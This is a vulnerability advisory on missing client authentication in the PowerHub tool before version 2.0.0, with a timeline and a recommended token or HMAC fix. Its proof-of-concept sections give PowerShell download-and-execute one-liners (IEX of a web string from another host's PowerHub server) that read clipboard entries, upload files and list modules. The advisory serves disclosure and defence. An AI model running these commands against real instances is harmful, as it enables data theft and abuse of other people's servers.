Skip to content

Security vulnerability

General information
Vulnerability type Missing authentication / Information Disclosure
Affected product https://github.com/AdrianVollmer/PowerHub
Reporter security-research@six-two.dev
Affected version(s) < 2.0.0
Fixed version 2.0.0

Short summary

The PowerHub software does not verify clients. This allows malicious actors to connect to a PowerHub instance as a client, read clipboard entries, obtain the name of the user running PowerHub, upload files and download modules (which may contain proprietary code). Attackers can also use publicly accessible PowerHub instances in their own attacks, which may be used to frame the operator of the server PowerHub is running on.

Recommendation

Client authentication

I would recommend adding a secret token variable to the launcher code:

$T='RandomSecretToken'; $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}

The token variable's contents can then be used to authenticate any requests performed by the client.

The token may be passed as a HTTP-header. Alternatively an HMAC over the requests body could be created and used to verify that the client knows the secret:

VerificationToken = HMAC(Token, HttpBody)

Prevent username leak

It is recommended to remove the username from the List-HubModules command output. Ideally only relative paths, such as ./custom.ps1 would be used.

Reproduction / Proof of Concept(s)

Due to time restraints, I have not actually developed an easy way to read the modules, clipboard entries, etc. However, since the PowerShell executes the code it should be possible to obtain this data by attaching a debugger or writing a custom client based on the source code of PowerHub.

Testing environment

As the target I used PowerHub installed on my host (Linux) via pip:

$ pip install powerhub
$ pip show powerhub
Name: PowerHub
Version: 1.11
[...]

As my attacker's machine I used a Windows VM. The VM was connected to the host via the Bridged Adapter option of VirtualBox.

Setup

Victim

  1. Start PowerHub: powerhub 192.168.0.116 --auth user:password
  2. Login to the web interface and add two clipboard entry.
  3. Create a custom module (~/.local/share/powerhub/modules/custom.ps1)

Attacker

  1. Run a local PowerHub instance, login to the web interface and grab the commands to execute on the client. Replace the local address and port with those of the victim.
  2. Execute these commands in a Windows PowerShell.

(1) Reading clipboard entries

Clipboard entries might be used to store sensitive information (such as command output containing hashes, passwords) to make it easily available on multiple machines. Or it may contain proprietary code, that is not intended to be leaked.

Clipboard entries are referenced by a counter, which makes them trivial to enumerate.

Clipboard entry 1:

$K=New-Object Net.WebClient;'a=reflection','t=http&c=1'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}

Clipboard entry 2:

$K=New-Object Net.WebClient;'a=reflection','t=http&c=2'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}

(2) Uploading files

Using the PushTo-Hub command, clients can upload files to the PowerHub server. Attackers may use this to fill the servers disk space (which may affect system availability) or upload illegal contents to frame the victim.

PS C:\Users\Admin>  $K=New-Object Net.WebClient;'a=reflection','t=http'|%{IEX $K.DownloadString('http://192.168.0.116:8080/0?'+$_)}
True
  _____   _____  _  _  _ _______  ______ _     _ _     _ ______
 |_____] |     | |  |  | |______ |_____/ |_____| |     | |_____]
 |       |_____| |__|__| |______ |    \_ |     | |_____| |_____]
1.11                        written by Adrian Vollmer, 2018-2022
Run 'Help-PowerHub' for help
PS C:\Users\Admin> PushTo-Hub C:\Users\Admin\Desktop\hacked.txt

Similarly the Mount-Webdav functionality can be used to upload files. However, this may also be used to distribute illegal contents, since attackers have read/write access to certain folders.

PS C:\Users\Admin> Mount-Webdav
PS C:\Users\Admin>

Files stored on the server (victim):

$ tree ~/.local/share/powerhub -h
[...]
├── [4.0K]  upload
│   └── [  20]  hacked.txt
├── [4.0K]  webdav
│   ├── [4.0K]  blackhole
│   ├── [5.9K]  New Text Document.txt
│   └── [4.0K]  public
│       └── [   4]  New Text Document.txt
[...]

(3) Listing and downloading modules

Clients can obtain a list of modules (PowerShell and executables). Attackers may use this fact to download modules from the server. If these modules contain confidential data (such as proprietary exploits or credentials for backdoors) these data can be accessed by anyone.

PS C:\Users\Admin> lshm

N Type Name                                                Loaded
- ---- ----                                                ------
0 ps1  /home/REDACTED/.local/share/powerhub/modules/custom.ps1 False
PS C:\Users\Admin> lhm 1
PS C:\Users\Admin>

This call additionally reveals the user's name, which may be used to perform attacks such as SSH password guessing attacks.

Solution

The problems were fixed in version 2.0.0. The response from the developer explains it best:

Hi,

version 2.0.0 has now been released. It should now be impossible to find an endpoint that discloses clipboard entries without knowing the key. Finding the key without knowing it already should also be impossible. And even then, only clipboard entries that have been marked as "executable" will be disclosed. Thanks again for reporting.

Timeline

Action Date
Vulnerabilities discovered 2022-08-13
Vulnerabilities reported 2022-08-15
Vulnerabilities resolved 2023-02-26
Published this advisory 2023-08-01

Note: The vulnerabilities were fixed as part of big rewrite (PowerHub Version 2), which is why the fix took a while to roll out.

Last update: 2023-08-02